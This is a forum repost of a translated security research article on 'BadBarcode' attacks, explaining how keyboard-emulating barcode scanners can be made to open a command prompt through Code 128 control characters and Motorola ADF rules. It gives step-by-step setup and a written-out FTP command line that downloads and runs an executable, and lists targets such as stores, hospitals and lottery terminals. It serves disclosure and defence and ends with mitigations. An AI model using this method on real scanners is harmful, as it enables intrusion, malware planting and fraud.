Jump to content
M2G

Barcode attack technique (Badbarcode)

Recommended Posts

Posted

Barcode attack technique (Badbarcode) - Drops

virustracker

Author:数据流@伏宸安全实验室
From:http://drops.wooyun.org/tips/12183


Barcode is everywhere in our daily life, especially in supermarkets, convenience stores and logistics industry. However, is it safe? The barcode attack that @Tk described on PacSec and included in his demo video on twitter are so cool that I bought a scanner for research as well. During my research, I went through all information whether it is at home or abroad, but none covers the possible attack techniques. So here is one.


2016011810574221306169.png

Barcodes are graphic identifiers used to represent a set of information by varying the widths and spacings of lines. Common barcodes are parallel lines constituted by black bars (abbreviated as bar) and white bars (abbreviated as space) that are with different reflectivity.

Here are several common types of barcode: code39, code128, code93, EAN128, EAN13 QR , etc. Most of them are one-dimensional, except for QR which is two-dimensional. This post mainly focuses on one-dimensional scanners. Code 128 is the one that is most widely used and supports most characters. Normally such attacks will exploit code 128 barcodes.


2016011810574463651230.png

Almost everyone has seen a barcode scanner in supermarkets, logistics, hospitals and lottery office. A scanner is used to read the information of a barcode. A conventional one often uses infrared ray to do that and its embedded chip outputs the result through processing. Some popular scanner brands in the world include Symbol, Honeywell and Datalogic. Amongst Symbol has been acquired by Motorola.

You’ll notice that when you pay the bill at the supermarket, the code of goods is displayed on the screen after scanning. Actually many scanners rely on keyboard for input, which means a scanner, in fact, is the equivalent of a keyboard. This is a huge risk.

2016011810574669389323.png


Since a scanner is a keyboard, any keyboard data can be entered by manipulating the data in barcodes. But, for example, UPC barcode only supports numbers and some may support numbers and letters, while code 128 is widely used because it supports ASCII 0-127 characters and that’s why it is called code 128. Barcode length is adjustable, which may support up to 232 characters.

Code 128 can be categorized into 3 groups:

  1. Code 128A: Standard numbers and uppercase letters, control characters, special characters
  2. Code 128B: Standard numbers and uppercase letters, lowercase letters, special characters
  3. Code 128C/EAN 128: number pair collections from [00] to [99], a total of 100, i.e., can only represent digital length of even numbers.

Code 128 consists of 4 parts: start code, data code, check code (optional) and end code.

2016011810574791379425.png

As shown above, the barcode has different widths and spacings of parallel lines and consists of black lines (bar) and white lines (space). Based on the widths of each line, it can be interpreted as 211214. The first bar contains of two units of vertical lines, while the second space contains of one unit of vertical line, so on and so forth. Normally the first six bars and spaces are a cell. The logic code for 211214 is 11010010000, which is also the start code.

Comparison between start codes:

  • 128A 11010000100
  • 128B 11010010000
  • 128C 11010011100

All end code is always 1100011101011.

According to the aforementioned logic code 11010010000, this barcode is a code128-B barcode.

201601181127162653355.jpg

201601181127178897166.jpg

In the end, the barcode data can be obtained through analysis based on the encoding table for code128.


According to the above code128 rule, you may write a program that can read and generate barcodes. But our purpose is to execute some operations. The simplest way is to use control characters. Control characters are non-word characters, such as carriage returns, line feeds and tab characters. In ASCII, 0-31 and 127 are control characters.

201601181127199964774.jpg

Based on the control characters table of ASCII, almost all Ctrl+? Key combinations are included, such as Ctrl+O to open a file, but this is only a local shortcut key combination which can only be used only in certain applications, for example, in a Browser and MS Word. Some of the control characters can be used in some terminals making the program jump out of the sandbox. How do we generate a barcode that makes a computer execute Ctrl+O? Since the above introduces the algorithm for code 128, it’s time to write your program. There are also many small programs that can generate barcodes on the Internet. Here I recommend a powerful barcode editor: BarTender.

201601181127205651784.jpg

After installation, click “file”-“new”-“finish” and there is a blank template.

201601181127223867395.jpg

Then click the barcode button to create your barcode and select code 128.

2016011811272422517101.jpg

Use BarTender to generate a barcode. Characters can be modified and debugged at any time. When scanning the above barcode, the scanner inputs “FutureSec” and outputs Ctrl+O.

20160118105801494091120.png

After scanning, the scanner pops up a dialog box immediately.

Almost every scanner can execute it, because code 128 is supported by many scanners.


Advanced Data Formatting (ADF) is an advanced input method developed by Motorola for scanners according to the rules you set for each step to customize input data, which can also be viewed as a barcode technique that supports programming.

For instance, within a check out system, when you scan a commodity, since check out system is not able to directly process the barcode, this technique is required. Check system identifier: A12345, which has to start with an A; data type of the barcode: 12345, pure numbers, in order to be identified by the check out system, it has to be processed before input.

Here is another example:

Barcode data:

8523647122

Output data from ADF:

8523641

How to implement ADF?

20160118105803421481215.png

There are not any Chinese materials about ADF on the Internet. And only a few appears on some English websites. However, you’ll also be confused by @TK’s introduction about ADF in his PPT because of the lack of details. Later, I found a 300-page ADF guide from Motorola.

ADF is a programming method which you may construct based on your need and it uses barcode instead of code for programming. ADF represents all rules by using barcode, such as Prefix/Suffix, Replacement and Character Input.

Use ADF to hijack data of a scanner

Before set up ADF setting for the scanner, scan the start mode first. Begin new rule.

2016011811272526563133.jpg

Then the scanned barcode will be added with a rule so long as the logic of the rule is legal.

Next scan the following barcodes in order

2016011811272863503142.jpg

2016011811272975074151.jpg

2016011811273157675161.jpg

2016011811273278391171.jpg

Then save the rule

2016011811273328901181.jpg

When saving the rule, all output data of the scanner will be hijacked as “TEST”. If you set ADF, your rule will be executed step by step.

How to recover it?

2016011811273570260191.jpg

Clear all barcodes with rule.


Since a command will be executed by solely using control characters and ADF supports simple programming and more keys, then system commands can be easily executed by using ADF. ADF supports more keys, for example, the most useful WIN+R.

2016011811273783714201.jpg

It is named GUI R in ADF. Since WIN+R is supported, cmd will be executed by using the above rule. But this is not enough, because the input is completed by system which is faster than human input. When you reach GUI R and execute “c”, ”m”, “d”, cmd is already entered before the dialog box for win+r pops up. Therefore, time delay is required. And ADF supports it, which equals to sleep() in programming.

2016011811273989493214.jpg

When inputing the ADF rule, two Numeric are entered as the scanning delay, such as, 0 and 1 which represent a delay of 0.1s; 0 and 5 equal to 0.5, the default values is 1 second.

If you know these ADF barcodes, you can construct a cmd popup and use control characters to execute commands that mainly include Enter. But if you do it as described above, it even requires 10 barcodes to pop a cmd box, which means the scanner has to repeat scanning for 10 times. Here is a demo from Tencent Xuan Wu Lab:

https://twitter.com/tombkeeper/status/663730674017300480

In the video, we used a pile of barcodes and scanned them for 10 times in sequence to get a cmd. This probably relates to the model of the scanner.

20160118105819416432210.png

If it’s like this, whether rule generation or exploitation will be troublesome. As a matter of fact, this can be optimized to combine the rules of ADF by using the scanner software-123scan from Motorola.

2016011810582237958235.png

123scan is a very powerful scanner management software by Motorola available at its official website. This software supports multiple functions. Next part is about how to use 123scan to set up ADF.

Open it and click "Create new configuration file"->"My scanner is NOT connected”->select scanner->"Modify data"->"Program complex data modifications"->"Create a new rule”.

2016011810582329512245.png

Click on Add action to add a rule.

2016011810582532314254.png

All ADF rules are included, including Beep control (control the buzzer for the scanner), Replace, etc.

2016011810582796715263.png

Set a 0.5s delay and add rules in order.

2016011810582887512272.png

Finally, all barcodes will be combined automatically and output.

2016011810583019957281.png

The above is the barcode payload used to execute arbitrary commands. Except the first to set factory settings and the second to clear all rules, it only requires 4 barcodes to execute any single commands. “Send All that remains” represents the original data of barcodes after setting the ADF. Here os the ADF process for the above 4 barcodes: input WIN+R->delay 0.5s->input c->input m->input d->input Carriage Return->delay 0.5s->execute contents of the barcode, and the following Send ALL that remains is the command to execute for multi-line commands. If it’s single line command, 4 barcodes will be enough and Send ALL that remains will not be required.

Use ADF to plant malware

Since cmd commands are to execute, the simplest way is to use ftp to download and execute arbitrary applications. The aforementioned Send ALL that remains can use BarTender to generate FTP commands.

2016011810583224826291.png

ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR»

The next is our demo video that has scanned ADF settings for 4 times. Whatever the barcode executes to Send All that remains. The video shows how to use FTP commands to execute.

(Tested model: Symbol-LS4208-SR20001ZZR)

http://v.youku.com/v_show/id_XMTQ0ODY0ODg1Ng==.html?from=y1.7-1.2

Password: wooyun520


Next is a summary of the possible attack scenarios:

1.Pay a bill

2016011810583398553301.png

Use barcode to replace commodities; Many convenience store supports WeChat, Ali Pay Barcode. The scanner supports multiple types of barcodes and it can scan the barcodes saved in the cell phone. Some markets equip with price query terminals. Use the terminal to scan a special barcode, you’ll be able to jump out of the terminal.

2.Hospital records, testing list

20160118105835382123110.png

Nowadays, the register at a hospital and medical records both have a barcode. Autonomous terminals in the hospital support the barcode or you may hand it to a nurse. Almost every hospital has such terminals that can generate testing list by scanning the barcode.

2016011810583793701324.png

3.Lottery ticket

2016011810583990138332.png

Lottery tickets have barcodes. The inspecting machine requires the barcode to identify this ticket. So it’s possible to forge or attack an inspecting machine, there are many types of lottery terminals.

2016011810584018837342.png

4.Express list

2016011810584236692352.png

Express lists also use barcode, normally the barcode can be code 128 or code 39. Some self-help pickup cabinets may be risky.

2016011810584468542362.png

There are many other scenarios that I won’t list here. If it’s possible, I’ll find another chance to analyze each scenario.


  1. Disable ADF function of the scanner by default.
  2. Avoid using keyboard simulation of the scanner.
  3. Set up hotkey blacklist.

The concept of using barcode to launch attack is raised years ago, but no one digs deep. By using SQL barcode, it’s able to launch SQL injection, XSS and overflow attack.

Whatever the device is, once part of the input can be manipulated, it is risky.


 

 

Sursa

  • Upvote 5

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...